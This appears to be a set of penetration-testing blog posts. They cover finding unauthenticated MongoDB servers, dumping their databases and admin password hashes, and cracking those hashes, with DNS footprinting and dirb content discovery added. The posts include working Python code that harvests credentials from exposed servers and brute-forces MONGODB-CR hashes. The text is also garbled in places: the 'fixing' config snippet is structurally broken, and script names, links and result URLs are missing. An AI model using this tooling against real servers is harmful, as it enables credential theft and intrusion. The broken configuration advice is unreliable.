Finding and Exploiting MongoDB

MongoDB is a NoSQL database used to handle backend data for many web applications. It is often used to store configuration, session, and user profile information. By default, MongoDB does not require authentication for client access. This is not a problem if MongoDB is listening only on localhost, but often it is not.

Finding MongoDB Servers

By default MongoDB listens on TCP port 27017, which is not in the Nmap top 1000 port list or in the /etc/services file used by Nessus. You will need to scan specifically for this port if you want to find the service.
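With Nmap this is as simple as nmap -p 27017 --open [targets]. As a minimal sketch, the same check can be done in Python with a plain TCP connect (the function name and timeout are illustrative; an open port only tells you something is listening there, not that it is MongoDB):

```python
import socket

def is_port_open(host, port=27017, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds (27017 is MongoDB's default port)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Connection refused, unreachable, or timed out.
        return False
```

Running this across a list of hosts gives you a quick candidate list to follow up on with Nessus, Metasploit, or the mongo client.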

Although MongoDB does not enable authentication by default, it can be enabled. Nessus, Metasploit, and Nmap all include checks to identify MongoDB servers that are not using authentication.

Manual Interaction with MongoDB

The easiest way to interact with MongoDB is to use the Mongo CLI client, mongo. On Kali 2 you can install the client by installing the mongodb-clients package with apt-get. After installing mongodb-clients you can connect to the MongoDB server using:

mongo [hostname]:[port]/[database_name]

The local database holds information about the server while the admin database holds any credentials stored on the server.

Once connected you can use the following commands to gather data from the server:

  • show databases – Shows all of the databases on the server.
  • use [database_name] – Switches to the specified database.
  • show collections – Shows a list of collections (similar to tables) in the current database.
  • db.[collection_name].findOne() – Displays the first entry in the collection. All collection entries are JSON documents.
  • db.[collection_name].find() – Displays a batch of entries in the collection.
  • it – Iterates through the list returned by find().

More information about using the mongo shell can be found in the official MongoDB documentation.

Scripted Interaction with MongoDB

One of the nice things about the mongo shell is that we can write JavaScript files and have the shell execute them against the server. So if there is a particular set of information you would like to find, you can write a script to gather that data for you.

To run a script, specify the script file as part of the mongo command used to connect to the server:

mongo [hostname]:[port]/[database_name] [script_name]

Example Script to Gather Mongo Server Info

Download the access.js script and run it against the “local” database on the MongoDB server. We need to specify the “local” database because that is where the startup_log collection is stored.

If you have a list of IP addresses that you want to gather information about, you can use a simple bash one-liner along with the access.js script to gather the data.

for i in $(cat ip_list); do echo $i; mongo $i/local access.js; done

Example Script to Gather Mongo Credentials

In some cases the MongoDB server may be configured to allow users to access it both with credentials and anonymously. In this case it may be possible to access the server anonymously and gather the plaintext or hashed credentials from the admin database. The creds.js script will gather MONGODB-CR and SCRAM-SHA-1 hashes from the “admin” database on the MongoDB server if they exist.
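A pymongo equivalent of the creds.js approach reads the admin database's system.users collection. This is a sketch: the helper names are mine, and the document layout shown (a credentials subdocument holding MONGODB-CR and SCRAM-SHA-1 entries) is what I have seen on 3.x servers, so treat it as an assumption:

```python
def extract_creds(user_doc):
    """Pull password material from an admin.system.users document (assumed layout)."""
    out = {"user": user_doc.get("user")}
    creds = user_doc.get("credentials", {})
    if "MONGODB-CR" in creds:
        # MONGODB-CR is stored as a single hex MD5 digest.
        out["MONGODB-CR"] = creds["MONGODB-CR"]
    if "SCRAM-SHA-1" in creds:
        s = creds["SCRAM-SHA-1"]
        out["SCRAM-SHA-1"] = (s["salt"], s["storedKey"], s["iterationCount"])
    return out

def dump_creds(host):
    """Connect anonymously (requires pymongo) and harvest admin.system.users."""
    from pymongo import MongoClient
    admin = MongoClient("mongodb://%s" % host, serverSelectionTimeoutMS=2000)["admin"]
    return [extract_creds(doc) for doc in admin["system.users"].find()]
```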

As of April 2016, oclHashcat could not crack either form of password hash. You can use the MongoDB password cracking scripts described in the next section to crack these passwords.

Fixing the Problem

MongoDB can be configured to require authentication for all user accounts and, as of MongoDB 3.0, it supports a strong password hashing algorithm, SCRAM-SHA-1. I highly recommend enabling authentication for all users and using the SCRAM-SHA-1 hashing algorithm with strong passphrases.
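As a minimal sketch, the relevant settings in the YAML mongod.conf format (MongoDB 2.6 and later) look something like this; the values are illustrative:

```yaml
  authorization: enabled   # require authentication for all clients
  port: 27017
  bindIp:          # listen on localhost only, if remote access is not needed
```

Note that accounts created before 3.0 may still carry MONGODB-CR credentials; check the MongoDB documentation for the supported procedure to upgrade existing accounts to SCRAM-SHA-1.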

Cracking MongoDB Passwords

On a recent penetration test I came across a number of MongoDB servers that allowed unauthenticated access. Using this access, I was able to download the MongoDB user accounts and their associated password hashes. MongoDB uses two password hashing schemes. The first is called MONGODB-CR, which is a simple MD5 hash of the string username:mongo:password. This password hashing algorithm is no longer used and has been replaced by a much stronger password hashing algorithm based on SCRAM-SHA-1. When MongoDB introduced the SCRAM-SHA-1 algorithm they didn’t update the older user accounts to use the new hashing algorithm so you will still find servers that use the older MONGODB-CR format.
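The MONGODB-CR scheme is trivial to reproduce. A minimal sketch in Python (the function names are mine):

```python
import hashlib

def mongodb_cr(username, password):
    """MONGODB-CR hash: hex MD5 of the string 'username:mongo:password'."""
    return hashlib.md5(("%s:mongo:%s" % (username, password)).encode()).hexdigest()

def crack_cr(username, target_hash, wordlist):
    """Return the candidate password whose MONGODB-CR hash matches, else None."""
    for word in wordlist:
        if mongodb_cr(username, word) == target_hash:
            return word
    return None
```

Because each guess costs a single MD5, even a plain loop like this gets through large wordlists quickly.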

I wrote two scripts to crack these passwords. The first is a Python script for cracking MONGODB-CR passwords; it is multithreaded and can process a large number of passwords quickly because MD5 hashes are cheap to compute. The script uses Python3 and only the standard libraries. To use it, run the script with hashfile and wordfile arguments, where hashfile is a file containing a list of colon (:) separated usernames and password hashes (one per line) and wordfile is a list of password candidates.

The second script, mongoscram.go, is written in Go, which is much faster than Python for calculating SCRAM-SHA-1 hashes. Since the SCRAM algorithm uses PBKDF2 with 10,000 iterations, cracking these passwords is compute intensive and takes a lot of time; the mongoscram.go script can test over 300 passwords per second for one user. To use the script you will need to install the latest version of the Go language and install the PBKDF2 library using go get. You will also need to define the GOPATH environment variable (on Linux or Mac, add export GOPATH=$HOME/go to your .bash_profile file).

When running the mongoscram.go script you will need to provide the username, password_file, salt, and stored_key. The username, salt, and stored_key can be obtained from the MongoDB server. The password_file is the list of passwords you want to test.

As always, if you have any trouble running the scripts or getting them to work please let me know and I will be happy to help.

DNS Footprinting at Scale

Recently I wrote an article on doing domain footprinting. Shortly after that article was published, a friend on Twitter mentioned that he was doing zone transfer research against the Alexa top 1 million web sites, so I decided to try my hand at it as well. My work on that project eventually resulted in code, raw data, and some analysis.

Part of the analysis from the zone transfer research resulted in a huge list of subdomain names. I took the top 10,000 subdomains and used a modified version of the script to footprint the Alexa top 1000 domains.

The modified script that I used and the resulting dataset (in tar.gz format) are both available. The script only works on one domain at a time, so I used the GNU parallel program to run 8 copies of the script in parallel. This gets through the top 1000 domains within a day; most domains take anywhere from 2 to 10 minutes depending on how fast their DNS servers respond.

To run the script in parallel use the following command:

parallel -a domain.list -j 8 ./dnsbrute {1} subdomain.list

Make sure you have Python3 installed along with the dnspython3, netaddr, and ipwhois libraries.

DNS Footprinting

There are a lot of tools available for doing target footprinting: Spiderfoot, Maltego, and theHarvester, to name a few. Unfortunately, I find something lacking in each of these tools. Spiderfoot and Maltego are too complicated for me. I really like the Unix philosophy of simple tools that do one thing well, and both of these fall outside of that philosophy. theHarvester fits much better into this philosophy, but it also provides a lot of data I don’t want when doing network footprinting, like email addresses and shared hosts.

When I am trying to footprint a network I am often only given a domain name and I want to know DNS names and IP addresses associated with that domain name. In addition, I want to know about the network blocks those IP addresses belong to and other servers that may be in those network blocks. With that in mind I wrote the Python script.


The script takes a domain name and provides the SOA record, MX records, and NS records. It then attempts a zone transfer from each of the name servers and then brute-forces DNS names using the provided word list. Next, it does a whois lookup to find network blocks associated with any IP addresses found in the A and AAAA records. Finally, it performs a reverse lookup on all of the identified IP addresses and on the small network blocks.


The following Python3 libraries are needed:

  • dnspython3
  • netaddr
  • ipwhois

Usage: domain wordlist

You can find an example of the output here:

Update 2016-01-20:

There is now a multi-threaded version of the script, The usage is the same as

Web Content Discovery with Parallel

In my previous post I showed you how to do content discovery using a bash one-liner and the dirb program. This works great if you have 5-10 servers, but if you have more than that you may need to run dirb against multiple servers at the same time. This is where the parallel command can help.

If the parallel command is not installed on your Kali box, you can install it with apt-get install parallel.

Using the following command we can run dirb against 16 servers at once.

cat websites.txt | parallel -j 16 dirb {} -f > websites.dirb

All of the stdout from all 16 jobs will be written to the websites.dirb file. Once the command completes you can grep the websites.dirb file for any identified files. The command grep '+' websites.dirb should produce results similar to the following:

+ (CODE:302|SIZE:257)
+ (CODE:200|SIZE:3751)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:504|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:3)
+ (CODE:302|SIZE:1)